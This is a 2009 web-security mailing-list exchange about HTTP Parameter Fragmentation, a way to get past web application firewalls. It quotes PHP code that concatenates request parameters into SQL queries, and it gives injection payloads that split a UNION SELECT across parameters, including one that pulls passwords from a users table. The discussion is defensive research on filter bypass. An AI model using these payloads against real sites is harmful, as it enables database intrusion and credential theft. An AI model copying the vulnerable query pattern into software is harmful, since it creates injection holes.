[WEB SECURITY] HTTP parameters fragmentation

lavakumar kuppan lavakumar.in at gmail.com
Wed Aug 19 13:02:17 EDT 2009


Hi Dmitriy,

That is very interesting. It very closely resembles the ModSecurity Filter
Bypass that I had discovered sometime back.
There is just one small difference, I was using the same parameter multiple
times(HTTP Parameter Pollution) while you are using multiple parameters,
nice trick!

I had written a whitepaper on the same, you can find it at
http://lavakumar.com/Split_and_Join.pdf
The ModSecurity advisory is at http://lavakumar.com/modsecurity_hpp.txt

You can find more information about HPP at
http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf

Hope this helps.

Cheers,
Lava
http://www.lavakumar.com


2009/8/19 Dmitriy Evteev <devteev at ptsecurity.com>:
> While preparing an article about WAF bypassing methods, I found an
> interesting way to bypass filters via HTTP parameters fragmentation.
>
>
>
> Vulnerable code example
>
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
>
>
>
> The following request doesn’t allow to conduct an attack
>
> index.php?a=1+union+select+1,2/*
>
>
>
> The following request’s succeeded using HPF
>
> index.php?a=1+union/*&b=*/select+1,2
>
>
>
> In the case, SQL request looks like
>
> select * from table where a=1 union/* and b=*/select 1,2
>
>
>
> Another example:
>
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']."
limit
> ".$_GET['c']);
>
> Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']."
order
> by ".$_GET['c']." limit 1");
>
>
>
> Using HPF (HTTP Parameter Fragmentation), the request’s succeeded:
>
> index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--
>
>
>
> The question is: is there any name for the technique? Please, advise me if
> you know articles or experts in  the field (for example, I found a
reference
> in
>
http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf
,
> page 79).
>
> Thank you for help and cooperation in advance!
>
>
>
> - - - - - - - - - - - - - - -
> Best Regards, Dmitry Evteev
> Positive Technologies Co.
> Tel.: (495) 744-0144
> Web: http://www.ptsecurity.ru
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20090819/3caabe81/attachment.html>


More information about the websecurity mailing list